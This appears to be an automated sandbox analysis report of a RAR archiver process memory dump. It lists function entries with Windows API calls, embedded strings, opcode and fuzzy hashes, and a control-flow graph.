• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
• Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID:
• String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
• API String ID: 0-1628410872
• Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction ID: 6fc675bb074a8ec6e452606ab1e32cd46027313483f60b2f9b84593f31f74bd4
• Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
• Instruction Fuzzy Hash: 0CC2C363B4C182A1EB64BF2489461BFAE95AF42784FE98035CA4E463C5DFEDE544C370
Strings
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
• Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID:
• String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
• API String ID: 0-1660254149
• Opcode ID: 9786eab97e9e7573f4f21c10de3a27352e165464d21764c3c99cef1fe973803f
• Instruction ID: fb90b430eb90c97f6a6af5c68a45e30a661abd76dbd8d950561f54019df44aba
• Opcode Fuzzy Hash: 9786eab97e9e7573f4f21c10de3a27352e165464d21764c3c99cef1fe973803f
• Instruction Fuzzy Hash: EFE2BF27A08AC2A5EB20EB25CC841FFABA5FF45788F894035DA4D87796DFB9D544C310

Control-flow Graph

APIs
• Part of subcall function 00007FF702C44AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF702C1CC90), ref: 00007FF702C44AF5
• GetModuleFileNameW.KERNEL32(?,?,?,00007FF702C37E7D), ref: 00007FF702C4492E
• GetVersionExW.KERNEL32(?,?,?,00007FF702C37E7D), ref: 00007FF702C4496A
• LoadLibraryExW.KERNELBASE(?,?,?,00007FF702C37E7D), ref: 00007FF702C44993
• LoadLibraryW.KERNEL32(?,?,?,00007FF702C37E7D), ref: 00007FF702C4499F
Strings
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
• Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: Library$Load$FileFreeModuleNameVersion
• String ID: rarlng.dll
• API String ID: 2520153904-1675521814
• Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
• Instruction ID: fb2767e4aa0d7f5de9725b882683837963de13ff9b17e321609fac14f33fb847
• Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
• Instruction Fuzzy Hash: 3D31AF33A18A42A6FB28AB21EC413EBAB65FF04784FD04035EA4D42A84DFBDD545C720

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF702C24620,?,00000000,?,00007FF702C47A8C), ref: 00007FF702C24736
• FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF702C24620,?,00000000,?,00007FF702C47A8C), ref: 00007FF702C2476B
• GetLastError.KERNEL32(?,00000000,?,?,00007FF702C24620,?,00000000,?,00007FF702C47A8C), ref: 00007FF702C2477A
• FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF702C24620,?,00000000,?,00007FF702C47A8C), ref: 00007FF702C247A4
• GetLastError.KERNEL32(?,00000000,?,?,00007FF702C24620,?,00000000,?,00007FF702C47A8C), ref: 00007FF702C247B2
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
• Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: FileFind$ErrorFirstLast$Next
• String ID:
• API String ID: 869497890-0
• Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
• Instruction ID: 3204191e360afb9c66b48b12332a8e10a03f69e9634a1d07a62dd305f400201f
• Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
• Instruction Fuzzy Hash: 4741A673608A8166DB28AB25E8402EAA760FF49BB4F804331EA7D477C5DFACD159C710
APIs
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
• Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: Crypt$Context$AcquireRandomRelease
• String ID:
• API String ID: 1815803762-0
• Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
• Instruction ID: a056d579800d101b2fa6dcacfcb9ae312ca5bf08f98a65b2f41d1063e5235bc0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A016D26B0865092E700AB16A85432AAB61EFC5FD0F588031DE4D43B68CFBDD946C740
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 751630497-0
                                                                                                                                                                                                                                            • Opcode ID: ddc78f3efe1ff8920d6ce08f229d314778f69db7ccd8907a5870e3e9de4cedf5
                                                                                                                                                                                                                                            • Instruction ID: a7549fb53cb43df036f1d79d9187c6f62f344bbc07e7bfe54e7877bd138acacc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ddc78f3efe1ff8920d6ce08f229d314778f69db7ccd8907a5870e3e9de4cedf5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B228123A08682A6E714EF30D8801FFBBA0FF50748F944535DA8D96699DFB8E945C760
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c22c5c0b8979b7c17b88d60497a3e69d5a18a8edfd679724e5113879f46e49dc
                                                                                                                                                                                                                                            • Instruction ID: 41f66b43ab50baa03b922f0d86f73ec92aedac2e935927959a00d1abd7828b29
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c22c5c0b8979b7c17b88d60497a3e69d5a18a8edfd679724e5113879f46e49dc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0471C233A0568546D708EF26E8052EE7791FB88B98F044235DF5D8B399DFB8E491C7A0

Control-flow Graph (rendered image; legend marks basic blocks as Executed or Not Executed)

control_flow_graph 635 7ff702c43ea8-7ff702c43f03 call 7ff702c5a5a0 call 7ff702c5c8a0 640 7ff702c43f40-7ff702c43f50 call 7ff702c4a9e8 635->640 641 7ff702c43f05-7ff702c43f3e GetModuleFileNameW call 7ff702c34e14 call 7ff702c4a9c0 635->641 644 7ff702c43f55-7ff702c43f79 call 7ff702c21874 call 7ff702c21e80 640->644 641->644 652 7ff702c44692-7ff702c446c5 call 7ff702c218ac call 7ff702c5a610 644->652 653 7ff702c43f7f-7ff702c43f89 644->653 655 7ff702c43fae-7ff702c43feb call 7ff702c5ec70 * 2 653->655 656 7ff702c43f8b-7ff702c43fac call 7ff702c411c0 * 2 653->656 668 7ff702c43fef-7ff702c43ff3 655->668 656->655 669 7ff702c43ff9-7ff702c4402d call 7ff702c22440 call 7ff702c22150 668->669 670 7ff702c440f2-7ff702c44112 call 7ff702c222e0 call 7ff702c5eb90 668->670 680 7ff702c440bc-7ff702c440e2 call 7ff702c222e0 669->680 681 7ff702c44033 669->681 670->652 679 7ff702c44118-7ff702c44131 call 7ff702c22150 670->679 691 7ff702c44138-7ff702c4414b call 7ff702c5eb90 679->691 692 7ff702c44133-7ff702c44136 679->692 680->668 694 7ff702c440e8-7ff702c440ec 680->694 683 7ff702c4403a-7ff702c4403e 681->683 686 7ff702c44040-7ff702c44044 683->686 687 7ff702c44064-7ff702c44069 683->687 686->687 693 7ff702c44046-7ff702c4405e call 7ff702c62290 686->693 689 7ff702c44097-7ff702c4409f 687->689 690 7ff702c4406b-7ff702c44070 687->690 696 7ff702c440b7 689->696 697 7ff702c440a1 689->697 690->689 695 7ff702c44072-7ff702c44078 690->695 691->652 708 7ff702c44151-7ff702c4416c call 7ff702c4d54c call 7ff702c5eb88 691->708 698 7ff702c4416f-7ff702c441b1 call 7ff702c4a900 call 7ff702c5eb90 692->698 709 7ff702c44060 693->709 710 7ff702c440a3-7ff702c440a7 693->710 694->652 694->670 702 7ff702c4407a-7ff702c44091 call 7ff702c61700 695->702 703 7ff702c44093 695->703 696->680 697->683 717 7ff702c441c0-7ff702c441d5 698->717 718 7ff702c441b3-7ff702c441bb call 7ff702c5eb88 698->718 702->703 715 7ff702c440a9-7ff702c440b5 702->715 703->689 708->698 709->687 710->696 715->680 721 7ff702c441db 717->721 722 7ff702c445f0-7ff702c44624 call 7ff702c43884 call 7ff702c5eb88 * 2 717->722 718->652 726 7ff702c441e1-7ff702c441ee 721->726 759 7ff702c4464a-7ff702c44691 call 7ff702c5ec70 * 2 722->759 760 7ff702c44626-7ff702c44648 call 7ff702c411c0 * 2 722->760 728 7ff702c44508-7ff702c44513 726->728 729 7ff702c441f4-7ff702c441fa 726->729 728->722 731 7ff702c44519-7ff702c44523 728->731 732 7ff702c44208-7ff702c4420e 729->732 733 7ff702c441fc-7ff702c44202 729->733 735 7ff702c44585-7ff702c44589 731->735 736 7ff702c44525-7ff702c4452b 731->736 737 7ff702c443d0-7ff702c443e0 call 7ff702c4a580 732->737 738 7ff702c44214-7ff702c4425c 732->738 733->728 733->732 740 7ff702c4458b-7ff702c4458f 735->740 741 7ff702c445a3-7ff702c445d4 call 7ff702c43884 735->741 743 7ff702c445db-7ff702c445de 736->743 744 7ff702c44531-7ff702c44539 736->744 755 7ff702c444f0-7ff702c44503 737->755 756 7ff702c443e6-7ff702c44414 call 7ff702c4a9e8 call 7ff702c6172c 737->756 745 7ff702c44261-7ff702c44264 738->745 740->741 748 7ff702c44591-7ff702c44597 740->748 741->743 743->722 753 7ff702c445e0-7ff702c445e5 743->753 751 7ff702c4453b-7ff702c4453e 744->751 752 7ff702c44573-7ff702c4457a 744->752 746 7ff702c44268-7ff702c44270 745->746 746->746 754 7ff702c44272-7ff702c44288 call 7ff702c61700 746->754 748->743 758 7ff702c44599-7ff702c445a1 748->758 762 7ff702c4456a-7ff702c44571 751->762 763 7ff702c44540-7ff702c44543 751->763 757 7ff702c4457e-7ff702c44583 752->757 753->726 778 7ff702c4428a-7ff702c44295 754->778 779 7ff702c442a3 754->779 755->728 756->755 787 7ff702c4441a-7ff702c444a9 call 7ff702c4d840 call 7ff702c4a900 call 7ff702c4a8c4 call 7ff702c4a900 call 7ff702c615fc 756->787 757->743 758->743 759->652 760->759 762->757 768 7ff702c44561-7ff702c44568 763->768 769 7ff702c44545-7ff702c44548 763->769 768->757 774 7ff702c4454a-7ff702c4454d 769->774 775 7ff702c44558-7ff702c4455f 769->775 774->748 776 7ff702c4454f-7ff702c44556 774->776 775->757 776->757 778->779 783 7ff702c44297-7ff702c442a1 778->783 785 7ff702c442a7-7ff702c442be 779->785 783->785 785->745 788 7ff702c442c0-7ff702c442c2 785->788 821 7ff702c444ab-7ff702c444bb 787->821 822 7ff702c444bf-7ff702c444cf 787->822 790 7ff702c442e6 788->790 791 7ff702c442c4-7ff702c442d6 call 7ff702c4a900 788->791 790->737 794 7ff702c442ec 790->794 796 7ff702c442db-7ff702c442e1 791->796 797 7ff702c442f1-7ff702c442f7 794->797 799 7ff702c445d6 796->799 800 7ff702c442f9-7ff702c442fe 797->800 801 7ff702c44300-7ff702c44303 797->801 799->743 800->801 802 7ff702c44305-7ff702c44314 800->802 801->797 804 7ff702c4433d-7ff702c44347 802->804 805 7ff702c44316-7ff702c44320 802->805 808 7ff702c445ea-7ff702c445ef call 7ff702c5a774 804->808 809 7ff702c4434d-7ff702c44378 call 7ff702c4d840 804->809 807 7ff702c44323-7ff702c44327 805->807 807->804 812 7ff702c44329-7ff702c4433b 807->812 808->722 819 7ff702c4437a-7ff702c44399 call 7ff702c61764 809->819 820 7ff702c4439e-7ff702c443cb call 7ff702c4470c 809->820 812->804 812->807 819->796 820->796 821->822 825 7ff702c444d2-7ff702c444d8 822->825 828 7ff702c444da-7ff702c444e5 825->828 829 7ff702c444eb-7ff702c444ee 825->829 828->799 828->829 829->825
APIs
Strings
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
• Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: FileModuleNamesnprintfwcschr
• String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
• API String ID: 602362809-1645646101
• Opcode ID: 67572efc140f081c2830ab2ac114563b4482ba77154e748fab887036bccabc43
• Instruction ID: 644ffc6ead4ba0149d6c74b9384ee0be3881d6398dda28edada75000ac615010
• Opcode Fuzzy Hash: 67572efc140f081c2830ab2ac114563b4482ba77154e748fab887036bccabc43
• Instruction Fuzzy Hash: 7722A023A18A82A5EB34EB15DC402BBAB62FF44784FD04135EA4E87695EFFCE544C350

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
APIs
Strings
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
• Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: wcschr
• String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
• API String ID: 1497570035-1281034975
• Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction ID: ac5b42b42ac7ec7120651e4e3ebe7e5b3e9bc8e162e53abae3775508712fdb21
• Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
• Instruction Fuzzy Hash: 35C15163B18682A4EB25BA25CC521FF9A51AF877C4FC44131DA4E5A7DADFECE501C320

Control-flow Graph

• Executed
• Not Executed
APIs
Strings
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
• Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: AddressProc$CallerCurrentDirectoryProcessSystem
• String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
• API String ID: 1389829785-2207617598
• Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
• Instruction ID: d58bd4db819258c19524c58b128c39a932f8a06a6917b4c12257925e2cf53f16
• Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
• Instruction Fuzzy Hash: EF415B26A08A92A1EB45FB12AC04537EFA2AF45BD4F980631DC2D07794DFFDE446C360

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000044.00000002.1923395362.00007FF702C01000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF702C00000, based on PE: true
• Associated: 00000044.00000002.1923361859.00007FF702C00000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923504077.00007FF702C88000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923540470.00007FF702C89000.00000008.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C8A000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C94000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702C9E000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923574782.00007FF702CA6000.00000004.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923717407.00007FF702CA8000.00000002.00000001.01000000.0000001A.sdmp
• Associated: 00000044.00000002.1923755863.00007FF702CAE000.00000002.00000001.01000000.0000001A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_68_2_7ff702c00000_rar.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
• String ID:
• API String ID: 552178382-0
• Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
• Instruction ID: 12b608eeb27ed9d81eee662cb967363212fb412013df4d3ea008f1682f0340be
• Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
• Instruction Fuzzy Hash: D3314C23A0856361EB54BB259C153BBEF91AF45788FC40434EA0D4729BDFACE884C371

Control-flow Graph

APIs
• RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF702C4495D,?,?,?,00007FF702C37E7D), ref: 00007FF702C447DB
